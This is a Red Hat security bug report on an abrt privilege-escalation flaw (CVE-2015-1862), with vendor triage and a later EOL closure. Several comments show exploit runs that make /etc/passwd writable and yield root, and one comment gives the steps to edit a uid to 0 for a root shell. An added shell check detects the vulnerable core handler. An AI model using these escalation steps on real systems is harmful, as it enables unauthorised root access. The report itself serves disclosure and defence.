Bug 1211223 (CVE-2015-1862) - CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
Summary: CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
Alias: CVE-2015-1862
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On:
Blocks: 1211224 1214172
Reported: 2015-04-13 10:58 UTC by Vasyl Kaigorodov
Modified: 2021-02-17 05:25 UTC

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
A flaw was found in the way certain ABRT core handlers processed crash reports in a namespaced environment. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Clone Of:
Last Closed: 2015-07-09 05:38:34 UTC

Description Vasyl Kaigorodov 2015-04-13 10:58:26 UTC
A local privilege escalation flaw was found in abrt, in the way certain core-handlers were specified by the abrt application. 

Specifically this issue affects those abrt versions in which the following core-handler was used:
HOOK_BIN="/usr/sbin/chroot /proc/%P/root @libexecdir@/abrt-hook-ccpp"

This commit was added to abrt via: (To add support for handling crashes inside containers)

But later removed via:

No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code.

Support for containers was re-added in abrt (using a different method this time) via:

Comment 2 Francisco Alonso 2015-04-14 13:48:45 UTC
Public via:


Comment 3 Tavis Ormandy 2015-04-14 19:10:49 UTC
It's not obvious to me that abrt in RHEL7 is not affected, are you sure?

I installed a default RHEL 7.1 Workstation in a VM, ran the exploit and it worked.

[taviso@localhost ~]$ gcc raceabrt.c -o /tmp/raceabrt
[taviso@localhost ~]$ /tmp/raceabrt /etc/passwd
Detected ccpp-2015-04-14-20:09:32-15116.new, attempting to race...
	Didn't win, trying again!
[snip lots of output]
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15493.new, attempting to race...
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15499.new, attempting to race...
	Exploit successful...
-rw-r--r--. 1 taviso abrt 2066 Apr 14 13:02 /etc/passwd
[taviso@localhost ~]$ cat /etc/redhat-release 
Red Hat Enterprise Linux Workstation release 7.1 (Maipo)

Comment 4 Tavis Ormandy 2015-04-14 19:14:29 UTC
In case it isn't obvious, you can easily turn this into a root shell like this:

 $ getent passwd taviso
 taviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash
 $ vi /etc/passwd
 $ getent passwd taviso
 taviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash
 $ su taviso
 # id
 uid=0(root) gid=0(root) groups=0(root)

Comment 6 Florian Weimer 2015-04-14 20:13:10 UTC
The issue raised in comment #3 and comment #4 is a different vulnerability, not CVE-2015-1862.  It is currently under investigation.

Comment 7 Huzaifa S. Sidhpurwala 2015-04-15 05:25:03 UTC
Further clarification on previous comments:

Various flaws were discovered with abrt in Red Hat Enterprise Linux and Fedora. These were initially discussed on the closed vendors list called linux-distros, before being made public.

Initially a flaw related to namespaces/chroot support in abrt was discussed and was assigned CVE-2015-1862. This bug relates to that particular CVE/flaw.

As mentioned above, since namespaces/chroot support in abrt does not exist in Red Hat Enterprise Linux and Fedora, these products are not affected by CVE-2015-1862.

Later, various other flaws were discussed on the list; these flaws were not assigned CVEs and it was suggested to discuss them via the open list, oss-security. These various other flaws are tracked via the following bug:


These additional flaws (tracked via bug 1211835) have been rated as having Important impact for Red Hat Enterprise Linux 7 as they can lead to privilege escalation to root (from a non-root local user), and Moderate impact for Red Hat Enterprise Linux 6, since they can lead to privilege escalation to root only from the abrt user.

Comment 9 Vincent Danen 2015-04-15 14:02:30 UTC

Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7

Comment 10 Tavis Ormandy 2015-04-17 21:02:20 UTC
Thanks for the clarification, however I'm also confused about the statement "No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code", isn't Fedora 20 still supported?

$ rpm -qf /usr/libexec/abrt-hook-ccpp
$ cat /etc/fedora-release 
Fedora release 20 (Heisenbug)
$ sysctl kernel.core_pattern
kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

And the exploit works:

$ gcc newpid.c -o test -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
$ ./test 
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),18(dialout),987(wireshark),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
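
A defensive check for the core handler quoted in the description and in the sysctl output of comment 10, added here as an example; it is not part of the bug report or of abrt. The function name and the output labels are hypothetical, and the check generalizes beyond the page's exact string by flagging any handler word under /proc/%P/root or /proc/%p/root.

```shell
#!/bin/sh
# Added example: classify a kernel.core_pattern value.
# Output: "file", "pipe", or "pipe-proc-root" (the handler shape this bug describes).
classify_core_pattern() {
    pattern=$1
    case $pattern in
        '|'*) ;;                       # leading '|': the kernel runs a helper as root
        *) echo "file"; return 0 ;;    # plain core file name template
    esac
    set -f                             # no globbing while word-splitting
    set -- ${pattern#'|'}              # helper command line, split on whitespace
    set +f
    for word in "$@"; do
        case $word in
            # %P = PID in the initial namespace, %p = PID as seen by the process.
            # Either way the path points into a root directory chosen by the
            # crashing process, so anything resolved under it is untrusted.
            /proc/%P/root*|/proc/%p/root*)
                echo "pipe-proc-root"; return 0 ;;
        esac
    done
    echo "pipe"
}

# Value reported in comment 10 for Fedora 20.
reported='|/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e'
# Constructed sample: the same helper invoked without the chroot prefix.
constructed='|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e'

echo "reported:    $(classify_core_pattern "$reported")"
echo "constructed: $(classify_core_pattern "$constructed")"

# Audit the running system when the sysctl is readable.
if [ -r /proc/sys/kernel/core_pattern ]; then
    live=$(cat /proc/sys/kernel/core_pattern)
    echo "live:        $(classify_core_pattern "$live")  <- $live"
fi
```

A result of pipe-proc-root on a live system means the root-run core handler is resolved inside a directory tree the crashing process controls.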

Comment 11 Huzaifa S. Sidhpurwala 2015-07-09 05:38:34 UTC
Please note: Fedora 20 is now EOL and will not be patched for any flaws.
Closing this flaw.
